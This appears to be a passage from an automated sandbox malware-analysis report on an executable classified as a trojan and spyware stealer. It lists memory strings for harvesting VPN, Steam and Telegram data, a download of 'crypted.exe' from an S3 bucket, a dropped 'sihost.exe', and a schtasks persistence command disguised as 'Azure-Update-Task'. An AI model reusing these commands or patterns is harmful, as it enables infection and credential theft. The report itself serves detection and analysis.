                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartNordVPN
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartNordVPNResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartOpenVPN
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartOpenVPNResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProcesses
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProcessesResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProtonVPN
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProtonVPNResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartScannedFiles
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartScannedFilesResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartSteamFiles
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartSteamFilesResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFiles
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFilesResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438188355.0000000004FA6000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFilesResponsel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponseD
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438188355.0000000004FA6000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponsel
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip
                      Source: eYvT1lg5Dy.exeString found in binary or memory: https://api.ip.sb/geoip%USERPEnviron
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.448050710.000000000A570000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia/
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438259960.0000000004FCA000.00000004.00000001.sdmpString found in binary or memory: https://cli-4576347563476534786.s3.us-east-2.amazonaws.com
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438259960.0000000004FCA000.00000004.00000001.sdmpString found in binary or memory: https://cli-4576347563476534786.s3.us-east-2.amazonaws.com/crypted.exe
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438259960.0000000004FCA000.00000004.00000001.sdmpString found in binary or memory: https://cli-4576347563476534786.s3.us-east-2.amazonaws.com4On
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: eYvT1lg5Dy.exeString found in binary or memory: https://www.digicert.com/CPS0
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, tmp6D2C.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownDNS traffic detected: queries for: api.ip.sb
                      Source: global trafficHTTP traffic detected: GET /crypted.exe HTTP/1.1Host: cli-4576347563476534786.s3.us-east-2.amazonaws.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 52.219.104.152:443 -> 192.168.2.6:49741 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 11_2_00401B3B OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,11_2_00401B3B
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 11_2_00401AD7 GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,11_2_00401AD7
                      Source: eYvT1lg5Dy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_00408C601_2_00408C60
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_0040DC111_2_0040DC11
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_00407C3F1_2_00407C3F
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_00418CCC1_2_00418CCC
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_00406CA01_2_00406CA0
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004028B01_2_004028B0
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_0041A4BE1_2_0041A4BE
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004182441_2_00418244
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004016501_2_00401650
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_00402F201_2_00402F20
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004193C41_2_004193C4
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004187881_2_00418788
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_00402F891_2_00402F89
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_00402B901_2_00402B90
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004073A01_2_004073A0
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: String function: 0040E1D8 appears 44 times
                      Source: eYvT1lg5Dy.exeBinary or memory string: OriginalFilename vs eYvT1lg5Dy.exe
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameShtups.exe4 vs eYvT1lg5Dy.exe
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmpBinary or memory string: OriginalFilename_.dll4 vs eYvT1lg5Dy.exe
                      Source: eYvT1lg5Dy.exeStatic PE information: invalid certificate
                      Source: eYvT1lg5Dy.exeVirustotal: Detection: 48%
                      Source: eYvT1lg5Dy.exeMetadefender: Detection: 34%
                      Source: eYvT1lg5Dy.exeReversingLabs: Detection: 81%
                      Source: eYvT1lg5Dy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\eYvT1lg5Dy.exe 'C:\Users\user\Desktop\eYvT1lg5Dy.exe'
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess created: C:\Users\user\AppData\Local\Temp\filename.exe 'C:\Users\user\AppData\Local\Temp\filename.exe'
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess created: C:\Users\user\AppData\Local\Temp\filename.exe 'C:\Users\user\AppData\Local\Temp\filename.exe' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile created: C:\Users\user\AppData\Local\Temp\tmp450C.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/25@4/2
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_01
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeMutant created: \Sessions\1\BaseNamedObjects\0N1Y/53R10U5/BU51N355
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5524:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCommand line argument: 08A1_2_00413780
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: eYvT1lg5Dy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: eYvT1lg5Dy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: eYvT1lg5Dy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: eYvT1lg5Dy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: eYvT1lg5Dy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: eYvT1lg5Dy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: eYvT1lg5Dy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: 1C:\leg21\vicodohubef11\bemov\nosiya\dajavut.pdb source: eYvT1lg5Dy.exe
                      Source: Binary string: C:\leg21\vicodohubef11\bemov\nosiya\dajavut.pdb source: eYvT1lg5Dy.exe
                      Source: Binary string: _.pdb source: eYvT1lg5Dy.exe
                      Source: Binary string: C:\dufire\fukiliyow\xefugopaja.pdb source: filename.exe, 0000000B.00000000.428820278.000000000041B000.00000002.00020000.sdmp, sihost.exe, 0000000E.00000000.440386838.000000000041B000.00000002.00020000.sdmp, filename.exe.1.dr
                      Source: eYvT1lg5Dy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: eYvT1lg5Dy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: eYvT1lg5Dy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: eYvT1lg5Dy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: eYvT1lg5Dy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeUnpacked PE file: 1.2.eYvT1lg5Dy.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeUnpacked PE file: 11.2.filename.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeUnpacked PE file: 14.2.sihost.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeUnpacked PE file: 1.2.eYvT1lg5Dy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeUnpacked PE file: 11.2.filename.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeUnpacked PE file: 14.2.sihost.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_0041C40C push cs; iretd 1_2_0041C4E2
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_00423149 push eax; ret 1_2_00423179
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_0041C50E push cs; iretd 1_2_0041C4E2
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004231C8 push eax; ret 1_2_00423179
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_0040E21D push ecx; ret 1_2_0040E230
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_0041C6BE push ebx; ret 1_2_0041C6BF
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: eYvT1lg5Dy.exeStatic PE information: real checksum: 0x63442 should be: 0x6f057
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile created: C:\Users\user\AppData\Local\Temp\filename.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 11_2_00401000 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00401000
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
